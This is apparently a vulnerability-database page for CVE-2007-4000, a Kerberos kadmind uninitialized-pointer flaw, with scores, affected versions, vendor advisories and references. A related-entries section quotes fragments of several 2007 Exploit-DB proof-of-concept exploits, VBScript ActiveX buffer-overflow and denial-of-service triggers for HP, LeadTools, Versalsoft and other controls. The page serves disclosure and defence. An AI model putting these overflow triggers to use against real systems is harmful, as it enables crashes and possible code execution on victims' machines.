CVE-2007-4000
published 2007-09-05CVE-2007-4000: The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through…
PriorityP345high8.5CVSS 2.0
AVNACMAuSCCICAC
EPSS
6.14%
92.6th percentile
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | krb5 | < krb5 1.6.dfsg.1-7 (bookworm) | krb5 1.6.dfsg.1-7 (bookworm) |
| fedoraproject | fedora | — | — |
| mit | kerberos_5 | 1.5 – 1.6.2 | — |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
| mit | krb5 | >= 0 < 1.6.dfsg.1-7 | 1.6.dfsg.1-7 |
CVSS provenance
nvdv2.08.5HIGHAV:N/AC:M/Au:S/C:C/I:C/A:C
osv8.5HIGH
vendor_debian8.5HIGH
vendor_redhat8.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
SonicWall
CVE-2007-5815: Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before
vendor_sonicwall·2007-11-05·CVSS 10.0
CVE-2007-5815 [CRITICAL] CWE-22 CVE-2007-5815: Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before
CVE-2007-5815: Absolute path traversal vulnerability in the WebCacheCleaner ActiveX control 1.3.0.3 in SonicWall SSL-VPN 200 before 2.1, and SSL-VPN 2000/4000 before 2.5, allows remote attackers to delete arbitrary files via a full pathname in the argument to the FileDelete method.
Red Hat
krb5 kadmind uninitialized pointer
vendor_redhat·2007-09-04·CVSS 8.5
CVE-2007-4000 [HIGH] krb5 kadmind uninitialized pointer
krb5 kadmind uninitialized pointer
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Debian
CVE-2007-4000: krb5 - The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the K...
vendor_debian·2007·CVSS 8.5
CVE-2007-4000 [HIGH] CVE-2007-4000: krb5 - The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the K...
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
Scope: local
bookworm: resolved (fixed in 1.6.dfsg.1-7)
bullseye: resolved (fixed in 1.6.dfsg.1-7)
forky: resolved (fixed in 1.6.dfsg.1-7)
sid: resolved (fixed in 1.6.dfsg.1-7)
trixie: resolved (fixed in 1.6.dfsg.1-7)
GHSA
GHSA-rjp4-vqhr-2249: The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy
ghsa_unreviewed·2022-05-01
CVE-2007-4000 [HIGH] CWE-824 GHSA-rjp4-vqhr-2249: The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
OSV
CVE-2007-4000: The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy
osv·2007-09-05·CVSS 8.5
CVE-2007-4000 [HIGH] CVE-2007-4000: The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy
The kadm5_modify_policy_internal function in lib/kadm5/srv/svr_policy.c in the Kerberos administration daemon (kadmind) in MIT Kerberos 5 (krb5) 1.5 through 1.6.2 does not properly check return values when the policy does not exist, which might allow remote authenticated users with the "modify policy" privilege to execute arbitrary code via unspecified vectors that trigger a write to an uninitialized pointer.
No detection rules found.
Exploit-DB
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
exploitdb·2007-07-02
CVE-2007-3554 HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
---
HP Instant Support - Driver Check Remote Buffer Overflow Exploit
author: Carlo Di Dato (aka shinnai)
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with IE7
Special thanks to:
rgod for his support and friendship
John Morris from HP Software Security for his honesty
str0ke... for being str0ke :)
HP Security Bulletin:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1
Exploit-DB
LeadTools Raster OCR Document Object Library - Memory Corruption
exploitdb·2007-05-30
CVE-2007-2981 LeadTools Raster OCR Document Object Library - Memory Corruption
LeadTools Raster OCR Document Object Library - Memory Corruption
---
2007/05/26
LeadTools Raster OCR Document Object Library (ltrdc14e.dll v. 14.5.0.44) Remote Memory corruption Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
Sub tryMe
buff = String(4000, "A")
test.DictionaryFileName = buff
End Sub
# milw0rm.com [2007-05-30]
Exploit-DB
Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service
exploitdb·2007-05-10
CVE-2007-2623 Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service
Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service
---
2007/05/10
RControl.dll v. 1.2.1.0 Denial of Service Exploit
url: http://www.fruit2004.com/
price: only $20 :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
If you try less than 4000 chr you'll see a strange crash. It seems like a
heap overflow in ntdll.dll but I'm really not sure of this thing :)
Connect
InternalServer
Quoting...
Sub tryMe
on error resume next
Dim MyMsg
if Pucca.value = "Connect" then
argCount = 5
arg1=String(8001,"A")
arg2=1
arg3="default"
arg4="default"
arg5="default"
target.connect arg1, arg2, arg3, arg4, arg5
elseif Pucca.value = "InternalServer" then
argCount = 1
arg1=Strin
Exploit-DB
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
exploitdb·2007-05-07
CVE-2007-2563 Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
---
2007/05/07
Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Try only 1500 characters (or less) to see IE crash.
Sub tryMe
on error resume next
arg1 = String (4000,"A")
target.AddFile arg1
End Sub
Sub QuoteMe
Dim MyMsg
MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
"I'm really out to sea" & vbCrLf & _
"This kettle is boiling over" & vbCrLf & _
"I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
End Sub
As y
Exploit-DB
NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities
exploitdb·2007-04-17
CVE-2007-2210 NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities
NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/23535/info
NetSprint Ask IE Toolbar ActiveX control is prone to multiple denial-of-service vulnerabilities.
Exploiting these issues allows remote attackers to crash applications that employ the vulnerable controls (typically Microsoft Internet Explorer). Attackers may potentially exploit these issues to execute code, but this has not been confirmed.
NetSprint Ask IE Toolbar 1.1 is vulnerable; other versions may also be affected.
arg=String(4000, "A")
target.AddAllowed arg
Exploit-DB
HP Instant Support - ActiveX Control Driver Check Buffer Overflow
exploitdb·2007-04-01
CVE-2007-3554 HP Instant Support - ActiveX Control Driver Check Buffer Overflow
HP Instant Support - ActiveX Control Driver Check Buffer Overflow
---
source: https://www.securityfocus.com/bid/24730/info
HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1 + second_exception + fir
http://secunia.com/advisories/26676http://secunia.com/advisories/26680http://secunia.com/advisories/26700http://secunia.com/advisories/26728http://secunia.com/advisories/26783http://secunia.com/advisories/26987http://securityreason.com/securityalert/3092http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-006.txthttp://www.gentoo.org/security/en/glsa/glsa-200709-01.xmlhttp://www.kb.cert.org/vuls/id/377544http://www.mandriva.com/security/advisories?name=MDKSA-2007:174http://www.novell.com/linux/security/advisories/2007_19_sr.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0858.htmlhttp://www.securityfocus.com/archive/1/478794/100/0/threadedhttp://www.securityfocus.com/bid/25533http://www.securitytracker.com/id?1018647http://www.vupen.com/english/advisories/2007/3051https://bugzilla.redhat.com/show_bug.cgi?id=250976https://exchange.xforce.ibmcloud.com/vulnerabilities/36438https://issues.rpath.com/browse/RPL-1696https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9278https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00087.htmlhttp://secunia.com/advisories/26676http://secunia.com/advisories/26680http://secunia.com/advisories/26700http://secunia.com/advisories/26728http://secunia.com/advisories/26783http://secunia.com/advisories/26987http://securityreason.com/securityalert/3092http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-006.txthttp://www.gentoo.org/security/en/glsa/glsa-200709-01.xmlhttp://www.kb.cert.org/vuls/id/377544http://www.mandriva.com/security/advisories?name=MDKSA-2007:174http://www.novell.com/linux/security/advisories/2007_19_sr.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0858.htmlhttp://www.securityfocus.com/archive/1/478794/100/0/threadedhttp://www.securityfocus.com/bid/25533http://www.securitytracker.com/id?1018647http://www.vupen.com/english/advisories/2007/3051https://bugzilla.redhat.com/show_bug.cgi?id=250976https://exchange.xforce.ibmcloud.com/vulnerabilities/36438https://issues.rpath.com/browse/RPL-1696https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9278https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00087.html
2007-09-05
Published